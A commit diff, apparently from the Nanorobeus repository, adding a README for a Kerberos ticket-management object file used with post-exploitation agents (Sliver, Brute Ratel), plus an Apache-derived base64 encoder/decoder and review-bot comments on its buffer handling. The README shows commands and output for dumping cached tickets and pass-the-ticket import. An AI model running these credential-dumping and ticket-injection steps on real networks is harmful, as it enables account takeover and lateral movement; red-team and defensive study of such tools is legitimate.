wavvs committed 2 years ago
1 + # Nanorobeus 2 + COFF file (BOF) for managing Kerberos tickets. 3 + 4 + ## Supported agents 5 + * [Sliver](https://github.com/BishopFox/sliver) 6 + * [Brute Ratel](https://bruteratel.com) 7 + 8 + ## Commands 9 + 10 + **luid** - get current logon ID 11 + 12 + **sessions** *[/luid <0x0>| /all]* - get logon sessions 13 + 14 + **klist** *[/luid <0x0> | /all]* - list Kerberos tickets 15 + 16 + **dump** *[/luid <0x0> | /all]* - dump Kerberos tickets 17 + 18 + **ptt** *\<base64\> [/luid <0x0>]* - import Kerberos ticket into a logon session 19 + 20 + **purge** [/luid <0x0>] - purge Kerberos tickets 21 + 22 + ## Examples 23 + Get current logon ID. 24 + ``` 25 + => nanorobeus64 luid 26 + 27 + [+] Current LogonId: 0:0x19ea88e 28 + ``` 29 + Get detailed information about the current logon session. 30 + ``` 31 + => nanorobeus64 sessions 32 + 33 + UserName : User 34 + Domain : FORTRESS 35 + LogonId : 0:0x19ea88e 36 + Session : 2 37 + UserSID : S-1-5-21-1768674056-2740991423-664180583-1105 38 + Authentication package : Kerberos 39 + LogonType : Interactive 40 + LogonTime (UTC) : 2/7/2022 19:22:43 41 + LogonServer : SERVER 42 + LogonServerDNSDomain : FORTRESS.LOCAL 43 + UserPrincipalName : [email protected] 44 + ``` 45 + List Kerberos tickets for the current logon session. When elevated, use `/all` to list tickets from all of the sessions or `/luid 0x0` to list tickets in a specified logon session. 
46 + ``` 47 + => nanorobeus64 klist 48 + 49 + UserName : User 50 + Domain : FORTRESS 51 + LogonId : 0:0x19ea88e 52 + Session : 2 53 + UserSID : S-1-5-21-1768674056-2740991423-664180583-1105 54 + Authentication package : Kerberos 55 + LogonType : Interactive 56 + LogonTime (UTC) : 2/7/2022 19:22:43 57 + LogonServer : SERVER 58 + LogonServerDNSDomain : FORTRESS.LOCAL 59 + UserPrincipalName : [email protected] 60 + 61 + [*] Cached tickets: (6) 62 + 63 + [0] 64 + Client name : User @ FORTRESS.LOCAL 65 + Server name : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL 66 + Start time : 2/7/2022 19:22:44 (UTC) 67 + End time : 3/7/2022 5:22:43 (UTC) 68 + Renew time : 9/7/2022 19:22:43 (UTC) 69 + Flags : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000) 70 + Encryption type : AES256_CTS_HMAC_SHA1 71 + ...(snip)... 72 + ``` 73 + Dump tickets from the current logon session. When elevated, use `/all` to dump tickets from all of the sessions or `/luid 0x0` to dump tickets from a specified logon session. 74 + ``` 75 + => nanorobeus64 dump 76 + 77 + UserName : User 78 + Domain : FORTRESS 79 + LogonId : 0:0x19ea88e 80 + Session : 2 81 + UserSID : S-1-5-21-1768674056-2740991423-664180583-1105 82 + Authentication package : Kerberos 83 + LogonType : Interactive 84 + LogonTime (UTC) : 2/7/2022 19:22:43 85 + LogonServer : SERVER 86 + LogonServerDNSDomain : FORTRESS.LOCAL 87 + UserPrincipalName : [email protected] 88 + 89 + [*] Cached tickets: (6) 90 + 91 + [0] 92 + Client name : User @ FORTRESS.LOCAL 93 + Server name : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL 94 + Start time : 2/7/2022 19:22:44 (UTC) 95 + End time : 3/7/2022 5:22:43 (UTC) 96 + Renew time : 9/7/2022 19:22:43 (UTC) 97 + Flags : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000) 98 + Encryption type : AES256_CTS_HMAC_SHA1 99 + Ticket : doIFFjCCBRKgAwIBBaEDAgEWooIEGTCCBBVhggQRMIIEDaADAg...(snip)... 100 + ``` 101 + Import a ticket into the current logon session. 
When elevated, use `/luid 0x0` to import the ticket into a specified logon session. 102 + ``` 103 + => make_token network fortress.local test pass 104 + => nanorobeus64 ptt doIFqjCCBaagAwIB...snip... 105 + 106 + [+] Ticket successfully imported. 107 + ``` 108 + Purge all Kerberos tickets from the current logon session. When elevated, use `/luid 0x0` to purge the tickets from a specified logon session. 109 + ``` 110 + => nanorobeus64 purge 111 + 112 + [+] Successfully purged tickets. 113 + ``` 114 + 115 + ## Credits 116 + * Rubeus - https://github.com/GhostPack/Rubeus 117 + * mimikatz - https://github.com/gentilkiwi/mimikatz -
1 + /* 2 + * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 + * 4 + * @APPLE_LICENSE_HEADER_START@ 5 + * 6 + * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 + * 8 + * This file contains Original Code and/or Modifications of Original Code 9 + * as defined in and that are subject to the Apple Public Source License 10 + * Version 2.0 (the 'License'). You may not use this file except in 11 + * compliance with the License. Please obtain a copy of the License at 12 + * http://www.opensource.apple.com/apsl/ and read it before using this 13 + * file. 14 + * 15 + * The Original Code and all software distributed under the License are 16 + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 + * Please see the License for the specific language governing rights and 21 + * limitations under the License. 22 + * 23 + * @APPLE_LICENSE_HEADER_END@ 24 + */ 25 + /* ==================================================================== 26 + * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 + * 28 + * Redistribution and use in source and binary forms, with or without 29 + * modification, are permitted provided that the following conditions 30 + * are met: 31 + * 32 + * 1. Redistributions of source code must retain the above copyright 33 + * notice, this list of conditions and the following disclaimer. 34 + * 35 + * 2. Redistributions in binary form must reproduce the above copyright 36 + * notice, this list of conditions and the following disclaimer in 37 + * the documentation and/or other materials provided with the 38 + * distribution. 39 + * 40 + * 3. 
All advertising materials mentioning features or use of this 41 + * software must display the following acknowledgment: 42 + * "This product includes software developed by the Apache Group 43 + * for use in the Apache HTTP server project (http://www.apache.org/)." 44 + * 45 + * 4. The names "Apache Server" and "Apache Group" must not be used to 46 + * endorse or promote products derived from this software without 47 + * prior written permission. For written permission, please contact 48 + * [email protected]. 49 + * 50 + * 5. Products derived from this software may not be called "Apache" 51 + * nor may "Apache" appear in their names without prior written 52 + * permission of the Apache Group. 53 + * 54 + * 6. Redistributions of any form whatsoever must retain the following 55 + * acknowledgment: 56 + * "This product includes software developed by the Apache Group 57 + * for use in the Apache HTTP server project (http://www.apache.org/)." 58 + * 59 + * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 + * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 + * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 + * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 + * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 + * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 + * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 + * OF THE POSSIBILITY OF SUCH DAMAGE. 
71 + * ==================================================================== 72 + * 73 + * This software consists of voluntary contributions made by many 74 + * individuals on behalf of the Apache Group and was originally based 75 + * on public domain software written at the National Center for 76 + * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 + * For more information on the Apache Group and the Apache HTTP server 78 + * project, please see <http://www.apache.org/>. 79 + * 80 + */ 81 + 82 + #pragma once 83 + 84 + int Base64encode_len(int len); 85 + int Base64encode(char* coded_dst, const char* plain_src, int len_plain_src); 86 + 87 + int Base64decode_len(const char* coded_src); 88 + int Base64decode(char* plain_dst, const char* coded_src); 89 + -
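Review bot: The four prototypes carry no contract for buffer sizing or return values, and the two halves differ in a way callers will get wrong: in the base64.c added by this same commit, Base64encode returns `p - encoded` after writing the terminator, so its count includes the NUL, while Base64decode returns `nbytesdecoded` with the NUL excluded, and both decode routines scan until the first byte outside the alphabet, so `coded_src` must be NUL-terminated (or end in `=`). I would put a comment above each pair, e.g. `/* coded_dst must hold Base64encode_len(len_plain_src) bytes; returns bytes written, NUL terminator included */` and `/* coded_src must be NUL-terminated; plain_dst must hold Base64decode_len(coded_src) bytes; returns decoded byte count (NUL not counted); malformed input is not reported */`. Stating the "no error reporting" part in the header matters here because the decoded bytes are ticket material that the caller hands on to the authentication package.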
1 + /* 2 + * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 + * 4 + * @APPLE_LICENSE_HEADER_START@ 5 + * 6 + * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 + * 8 + * This file contains Original Code and/or Modifications of Original Code 9 + * as defined in and that are subject to the Apple Public Source License 10 + * Version 2.0 (the 'License'). You may not use this file except in 11 + * compliance with the License. Please obtain a copy of the License at 12 + * http://www.opensource.apple.com/apsl/ and read it before using this 13 + * file. 14 + * 15 + * The Original Code and all software distributed under the License are 16 + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 + * Please see the License for the specific language governing rights and 21 + * limitations under the License. 22 + * 23 + * @APPLE_LICENSE_HEADER_END@ 24 + */ 25 + /* ==================================================================== 26 + * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 + * 28 + * Redistribution and use in source and binary forms, with or without 29 + * modification, are permitted provided that the following conditions 30 + * are met: 31 + * 32 + * 1. Redistributions of source code must retain the above copyright 33 + * notice, this list of conditions and the following disclaimer. 34 + * 35 + * 2. Redistributions in binary form must reproduce the above copyright 36 + * notice, this list of conditions and the following disclaimer in 37 + * the documentation and/or other materials provided with the 38 + * distribution. 39 + * 40 + * 3. 
All advertising materials mentioning features or use of this 41 + * software must display the following acknowledgment: 42 + * "This product includes software developed by the Apache Group 43 + * for use in the Apache HTTP server project (http://www.apache.org/)." 44 + * 45 + * 4. The names "Apache Server" and "Apache Group" must not be used to 46 + * endorse or promote products derived from this software without 47 + * prior written permission. For written permission, please contact 48 + * [email protected]. 49 + * 50 + * 5. Products derived from this software may not be called "Apache" 51 + * nor may "Apache" appear in their names without prior written 52 + * permission of the Apache Group. 53 + * 54 + * 6. Redistributions of any form whatsoever must retain the following 55 + * acknowledgment: 56 + * "This product includes software developed by the Apache Group 57 + * for use in the Apache HTTP server project (http://www.apache.org/)." 58 + * 59 + * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 + * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 + * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 + * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 + * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 + * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 + * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 + * OF THE POSSIBILITY OF SUCH DAMAGE. 
71 + * ==================================================================== 72 + * 73 + * This software consists of voluntary contributions made by many 74 + * individuals on behalf of the Apache Group and was originally based 75 + * on public domain software written at the National Center for 76 + * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 + * For more information on the Apache Group and the Apache HTTP server 78 + * project, please see <http://www.apache.org/>. 79 + * 80 + */ 81 + 82 + /* Base64 encoder/decoder. Originally Apache file ap_base64.c 83 + */ 84 + 85 + #include <string.h> 86 + 87 + #include "base64.h" 88 + 89 + /* aaaack but it's fast and const should make it shared text page. */ 90 + static const unsigned char pr2six[256] = { 91 + /* ASCII table */ 92 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 93 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 94 + 64, 64, 64, 64, 64, 64, 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 95 + 22, 23, 24, 25, 64, 64, 64, 64, 64, 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 96 + 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 97 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 98 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 99 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 100 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64}; 101 + 102 + int Base64decode_len(const char* bufcoded) { 103 + int nbytesdecoded; 104 + const unsigned char* bufin; 105 + int 
nprbytes; 106 + 107 + bufin = (const unsigned char*)bufcoded; 108 + while (pr2six[*(bufin++)] <= 63) 109 + ; 110 + 111 + nprbytes = (bufin - (const unsigned char*)bufcoded) - 1; 112 + nbytesdecoded = ((nprbytes + 3) / 4) * 3; 113 + 114 + return nbytesdecoded + 1; 115 + } 116 + 117 + int Base64decode(char* bufplain, const char* bufcoded) { 118 + int nbytesdecoded; 119 + const unsigned char* bufin; 120 + unsigned char* bufout; 121 + int nprbytes; 122 + 123 + bufin = (const unsigned char*)bufcoded; 124 + while (pr2six[*(bufin++)] <= 63) 125 + ; 126 + nprbytes = (bufin - (const unsigned char*)bufcoded) - 1; 127 + nbytesdecoded = ((nprbytes + 3) / 4) * 3; 128 + 129 + bufout = (unsigned char*)bufplain; 130 + bufin = (const unsigned char*)bufcoded; 131 + 132 + while (nprbytes > 4) { 133 + *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 134 + *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 135 + *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 136 + bufin += 4; 137 + nprbytes -= 4; 138 + } 139 + 140 + /* Note: (nprbytes == 1) would be an error, so just ingore that case */ 141 + if (nprbytes > 1) { 142 + *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 143 + } 144 + if (nprbytes > 2) { 145 + *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 146 + } 147 + if (nprbytes > 3) { 148 + *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 149 + } 150 + 151 + *(bufout++) = '\0'; 152 + nbytesdecoded -= (4 - nprbytes) & 3; 153 + return nbytesdecoded; 154 + } 155 + 156 + static const char basis_64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 157 + 158 + int Base64encode_len(int len) { return ((len + 2) / 3 * 4) + 1; } 159 + 160 + int Base64encode(char* encoded, const char* string, int len) { 161 + int i; 162 + char* p; 163 + 164 + p = encoded; 165 + for (i = 0; i < len - 2; i += 3) { 166 + *p++ = 
basis_64[(string[i] >> 2) & 0x3F]; 167 + *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)]; 168 + *p++ = basis_64[((string[i + 1] & 0xF) << 2) | ((int)(string[i + 2] & 0xC0) >> 6)]; 169 + *p++ = basis_64[string[i + 2] & 0x3F]; 170 + } 171 + if (i < len) { 172 + *p++ = basis_64[(string[i] >> 2) & 0x3F]; 173 + if (i == (len - 1)) { 174 + *p++ = basis_64[((string[i] & 0x3) << 4)]; 175 + *p++ = '='; 176 + } else { 177 + *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)]; 178 + *p++ = basis_64[((string[i + 1] & 0xF) << 2)]; 179 + } 180 + *p++ = '='; 181 + } 182 + 183 + *p++ = '\0'; 184 + return p - encoded; 185 + } 186 + -
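Review bot: Base64decode and Base64decode_len silently accept malformed input: the `while (pr2six[*(bufin++)] <= 63)` scan stops at the first non-alphabet byte, and a trailing group of one character is dropped exactly as the comment on the `nprbytes == 1` line says, so a truncated or garbled string decodes to a shorter blob with no error signalled. Since this decoder presumably feeds the `ptt` path, where the output is submitted to the authentication package, the caller cannot distinguish a clean decode from a mangled ticket; a sentinel for the impossible remainder, `if ((nprbytes & 3) == 1) return -1;` placed right after `nprbytes` is computed in Base64decode, lets the import be refused instead. The `int` arithmetic in Base64encode_len (`(len + 2) / 3 * 4`) is signed-overflow UB for lengths near INT_MAX, harmless for ticket-sized data but worth `size_t` if the API is reused. The decoded plaintext is raw ticket/session-key material, so whoever owns `plain_dst` should zero it before freeing; that is outside this file but worth a comment at the decode call site.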